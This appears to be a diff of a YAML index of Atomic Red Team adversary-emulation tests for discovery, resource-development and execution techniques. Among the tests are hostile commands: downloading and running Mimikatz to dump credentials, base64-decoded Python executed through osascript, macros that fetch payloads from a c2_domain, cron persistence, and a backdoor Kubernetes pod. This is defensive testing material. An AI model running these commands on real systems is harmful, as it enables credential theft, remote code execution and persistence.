be installed - ' +' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python - ' +' supported_platforms: - windows input_arguments: 
@@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' executor: command: 'python #(unknown) -i #{host_ip} - ' +' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery - ' +' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus - ' +' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares - ' +' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} - ' +' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare - ' +' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae 
@@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share - ' +' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain - ' +' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: '"Join system to domain" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 - ' +' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: 
@@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. - ' +' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v7 - ' +' executor: command: 'cat /etc/security/pwquality.conf - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v6 - ' +' executor: command: | cat /etc/pam.d/system-auth 
@@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. - ' +' supported_platforms: - linux executor: command: 'cat /etc/login.defs - ' +' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts - ' +' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts /domain - ' +' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. - ' +' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist - ' +' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain - ' +' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} - ' +' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
@@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i - ' +' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a - ' +' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' - ' +' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done - ' +' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f 
@@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'adidnsdump must be installed and part of PATH - ' +' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} - ' +' get_prereq_command: 'pip3 install adidnsdump - ' +' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} - ' +' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt 
@@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip neighbour show - ' +' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip route show - ' +' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." - ' +' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' - ' +' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' - ' +' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 - ' +' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI 
@@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - ' +' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors - ' +' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. - ' +' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info - ' +' supported_platforms: - macos executor: 
@@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info - ' +' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null - ' +' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. - ' +' supported_platforms: - windows executor: command: 'hostname - ' +' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. - ' +' supported_platforms: - linux - macos executor: command: 'hostname - ' +' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. - ' +' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid - ' +' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 
@@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - windows executor: command: 'set - ' +' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - macos - linux executor: command: 'env - ' +' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all - ' +' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist - ' +' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" - ' +' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee 
@@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection - ' +' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; - ' +' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) - ' +' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. - ' +' supported_platforms: - windows input_arguments: 
@@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. - ' +' supported_platforms: - windows executor: command: 'Get-Date - ' +' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date - ' +' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" - ' +' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. - ' +' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} - ' +' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob 
@@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word - ' +' supported_platforms: - windows executor: 
@@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script - ' +' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx - ' +' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl - ' +' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} - ' +' cleanup_command: 'launchctl remove #{label_name} - ' +' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file - ' +' supported_platforms: - windows input_arguments: 
@@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed - ' +' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null 
@@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" - ' +' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' - description: 'Google Chrome must be installed - ' +' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta - ' +' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). - ' +' supported_platforms: - windows input_arguments: 
@@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro - ' +' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - ' +' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel - ' +' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. - ' +' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) - ' +' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - ' +' - description: 'Microsoftt #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - ' +' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" - ' +' name: command_prompt elevation_required: true - name: Run BloodHound from local disk 
